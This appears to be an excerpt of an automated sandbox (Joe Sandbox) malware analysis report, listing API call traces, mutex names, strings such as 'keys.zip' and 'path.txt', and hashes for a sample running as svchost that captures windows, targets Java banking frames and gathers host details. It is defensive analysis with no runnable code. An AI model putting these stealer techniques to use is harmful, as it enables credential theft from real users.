                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB19D9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB19ED
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB19FF
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02CB17D0,00000000,00000000,00000000), ref: 02CB1A10
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02CB1A1F
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB1A26
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(a23c4220), ref: 02CB1A2D
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,a23c4220,KBP), ref: 02CB1A47
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CB1A50
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                              • String ID: KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$a23c4220
                                                                                                                                                                                                              • API String ID: 4173420962-2306827973
                                                                                                                                                                                                              • Opcode ID: e54e580e052274e6a70002295f794497b565d9c0362c52adc32ea4fb973d07a1
                                                                                                                                                                                                              • Instruction ID: f7751ac520db3301afa3af47716f7f1bfb809d9def141e3ec11ecb7f97e22ee4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e54e580e052274e6a70002295f794497b565d9c0362c52adc32ea4fb973d07a1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B201D634AC6311BFF22267604C2AF9E7A986F05B96F140610F91AF61C087E496048AAA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,02C9FB54,?), ref: 02C9F88F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F892
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02C9FB54,?), ref: 02C9F89B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F89E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,02C9FB54,?), ref: 02C9F8B1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F8B4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,02C9FB54,?), ref: 02C9F8BD
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F8C0
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000000,?,02C9FB54,?), ref: 02C9F8D3
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F8D6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,02C9FB54,?), ref: 02C9F8DF
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F8E2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,00000000,?,02C9FB54,?), ref: 02C9F8F5
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F8F8
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,02C9FB54,?), ref: 02C9F901
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,02C9FB54,?), ref: 02C9F904
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidate
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1670920773-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindow.USER32(00000000), ref: 02C9C96D
                                                                                                                                                                                                              • IsWindowVisible.USER32(00000000), ref: 02C9C97C
                                                                                                                                                                                                                • Part of subcall function 02C9DCE0: GetClassNameA.USER32(?,?,00000101), ref: 02C9DCF6
                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 02C9C9B9
                                                                                                                                                                                                              • GetClassLongA.USER32(00000000,000000E6), ref: 02C9C9C2
                                                                                                                                                                                                              • PrintWindow.USER32(00000000,?,00000000), ref: 02C9C9D5
                                                                                                                                                                                                              • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,?), ref: 02C9C9FB
                                                                                                                                                                                                              • CreateRectRgn.GDI32(?,?,?,?), ref: 02C9CA11
                                                                                                                                                                                                              • GetWindowRgn.USER32(00000000,00000000), ref: 02C9CA1B
                                                                                                                                                                                                              • OffsetRgn.GDI32(00000000,?,?), ref: 02C9CA35
                                                                                                                                                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 02C9CA40
                                                                                                                                                                                                              • BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00CC0020), ref: 02C9CA69
                                                                                                                                                                                                              • SelectClipRgn.GDI32(?,00000000), ref: 02C9CA72
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 02C9CA75
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$ClassClipRectSelect$CreateDeleteLongNameObjectOffsetPrintRedrawVisible
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3597830993-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(000004E3,00000000,?,?,?,?), ref: 02CBE265
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 02CBE281
                                                                                                                                                                                                              • GetFileInformationByHandle.KERNEL32(00000000,?), ref: 02CBE29B
                                                                                                                                                                                                              • FileTimeToSystemTime.KERNEL32(?,?), ref: 02CBE2B1
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 02CBE2DC
                                                                                                                                                                                                              • realloc.MSVCRT ref: 02CBE302
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02CBE375
                                                                                                                                                                                                              • free.MSVCRT(00000000,?,00000004,?,00000000,00000000), ref: 02CBE40A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • %02d/%02d/%04d %02d:%02d, xrefs: 02CBE2D6
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$HandleTime$ByteCharCloseCreateInformationMultiSystemWidefreereallocwsprintf
                                                                                                                                                                                                              • String ID: %02d/%02d/%04d %02d:%02d
                                                                                                                                                                                                              • API String ID: 3846129198-4051342895
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C,?,00000000), ref: 02CB41D7
                                                                                                                                                                                                              • _snprintf.MSVCRT ref: 02CB4237
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C), ref: 02CB4297
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: BackslashPath$_snprintf
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$keys.zip$path%i.txt$path.txt
                                                                                                                                                                                                              • API String ID: 761212885-4167808235
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401150: CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                                • Part of subcall function 00401150: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                                • Part of subcall function 00401150: memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                                • Part of subcall function 00401150: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                                • Part of subcall function 00401150: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                                • Part of subcall function 00401150: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                                • Part of subcall function 00401150: UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                                • Part of subcall function 00401150: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                                • Part of subcall function 00401150: HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 00401B4F
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00401B63
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401B74
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401B84
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BBE
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401BC1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401BCE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401BD1
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$FreeValidate$AddressAllocCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: G,@$RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1392322707-905597979
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02CACBAC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CACBB9
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CACBCD
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CACBDF
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02CACBEE
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C41FB), ref: 02CACBF5
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,A23C41FB,BSS), ref: 02CACC0F
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CACC15
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
                                                                                                                                                                                                              • String ID: A23C41FB$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
                                                                                                                                                                                                              • API String ID: 3206501308-2766367083
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: free$malloc
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2190258309-0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED098), ref: 02CB3B70
                                                                                                                                                                                                              • CreateDirectoryA.KERNEL32(?,00000000), ref: 02CB3BB1
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02CB3BBB
                                                                                                                                                                                                              • IsUserAnAdmin.SHELL32 ref: 02CB3BC3
                                                                                                                                                                                                              • PathMakeSystemFolderA.SHLWAPI(?), ref: 02CB3BD4
                                                                                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 02CB3BDB
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(?), ref: 02CB3BE8
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED098,?,02CB3D9C), ref: 02CB3C57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$BackslashDirectoryErrorLast$AdminCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                              • String ID: keys.zip$path1.txt
                                                                                                                                                                                                              • API String ID: 1373881290-1274251082
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB5124
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110,?,00000000,00000000), ref: 02CB5133
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 02CB513A
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB5152
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02CB5169
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,00000000,00000000), ref: 02CB516F
                                                                                                                                                                                                                • Part of subcall function 02CA41E0: GetProcessHeap.KERNEL32(00000008,02CB5097,00000000,75A934D0,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA41FE
                                                                                                                                                                                                                • Part of subcall function 02CA41E0: HeapAlloc.KERNEL32(00000000,?,?,02CB5084,00000104,?,?,?,?,00000000,00000000), ref: 02CA4205
                                                                                                                                                                                                                • Part of subcall function 02CA41E0: memset.MSVCRT ref: 02CA4215
                                                                                                                                                                                                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 02CB5190
                                                                                                                                                                                                              • StrChrIA.SHLWAPI(?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB51B7
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,00000001,00000104,?,?,00000000,?,?,?,?,00000000,00000000), ref: 02CB51CB
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_, xrefs: 02CB5100
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$memset$AllocComputerNameProcess$ErrorLastlstrcpyn
                                                                                                                                                                                                              • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
                                                                                                                                                                                                              • API String ID: 734199406-1705633369
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 02C974A0: CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,74DEF380,00000000,00000000,?,?,02CA4E91,?,00000000), ref: 02C974C6
                                                                                                                                                                                                                • Part of subcall function 02C974A0: GetFileSizeEx.KERNEL32(00000000,?,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C974E4
                                                                                                                                                                                                                • Part of subcall function 02C974A0: GetProcessHeap.KERNEL32(00000008,?,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C9750D
                                                                                                                                                                                                                • Part of subcall function 02C974A0: RtlAllocateHeap.NTDLL(00000000,?,?,02CA4E91,?,00000000,?,?,00000000), ref: 02C97514
                                                                                                                                                                                                                • Part of subcall function 02C974A0: memset.MSVCRT ref: 02C97527
                                                                                                                                                                                                                • Part of subcall function 02C974A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02C97553
                                                                                                                                                                                                                • Part of subcall function 02C974A0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C97563
                                                                                                                                                                                                                • Part of subcall function 02C974A0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02C97572
                                                                                                                                                                                                                • Part of subcall function 02C974A0: UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02C97585
                                                                                                                                                                                                                • Part of subcall function 02C974A0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C97594
                                                                                                                                                                                                                • Part of subcall function 02C974A0: HeapValidate.KERNEL32(00000000), ref: 02C9759B
                                                                                                                                                                                                              • RtlImageNtHeader.NTDLL(00000000), ref: 02CB53BE
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 02CB53D2
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02CA56AF), ref: 02CB53E3
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02CB53F3
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02CA56AF), ref: 02CB5430
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,02CA56AF), ref: 02CB5433
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02CA56AF), ref: 02CB5440
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,02CA56AF), ref: 02CB5443
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$File$Process$Validate$AddressAllocateCountCreateFreeHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
                                                                                                                                                                                                              • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                              • API String ID: 1866686876-3277137149
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02CB440C
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 02CB4422
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02CB4430
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB4439
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CB4451
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB4463
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(02CED19C), ref: 02CB446E
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,02CED19C,VEFK), ref: 02CB4488
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
                                                                                                                                                                                                              • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$VEFK
                                                                                                                                                                                                              • API String ID: 849374196-3911370694
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,02CDA450), ref: 02CB0121
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,02CDA488), ref: 02CB0131
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,02CDA4B8), ref: 02CB0141
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtFrame,02CDA4D8), ref: 02CB0151
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,02CDA450), ref: 02CB0161
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,02CDA488), ref: 02CB0171
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,02CDA4B8), ref: 02CB0181
                                                                                                                                                                                                              • FindWindowW.USER32(SunAwtDialog,02CDA4D8), ref: 02CB0191
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FindWindow
                                                                                                                                                                                                              • String ID: SunAwtDialog$SunAwtFrame
                                                                                                                                                                                                              • API String ID: 134000473-1757792087
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02CB32DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB32E5
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB32F9
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB330B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(A23C4505), ref: 02CB3316
                                                                                                                                                                                                              • Sleep.KERNEL32(00009C40,A23C4505,RFK), ref: 02CB3330
